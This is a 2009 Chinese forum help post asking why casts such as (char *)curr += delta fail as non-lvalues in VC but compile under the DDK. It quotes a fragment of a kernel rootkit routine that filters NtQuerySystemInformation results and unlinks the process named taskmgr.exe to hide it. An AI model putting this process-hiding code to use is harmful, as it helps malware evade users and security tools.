-
-
[求助]rootkit进程隐藏例子的一个疑问
-
发表于:
2009-1-20 22:48
5851
-
相信这一段代码大家都很熟悉吧?为什么我在VC中编译的时候会把下面标注为红色的的两句话报错呢?说是左操作数应该是一个左值,可是我在ddk中编译的时候却能正常通过,也能正常运行。
在这方面我是个小鸟,希望大家不吝赐教!
if(NT_SUCCESS(rc))
{
if(5 == SystemInformationClass)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
while(curr)
{
if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))
{
KdPrint(("hide process'name taskmgr.exe"));
if(prev)
{
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta; }
else
{
SystemInformation = NULL;
}
}
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;
break;
}
}
if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta); else curr = NULL;
}
}
}
[课程]FART 脱壳王!加量不加价!FART作者讲授!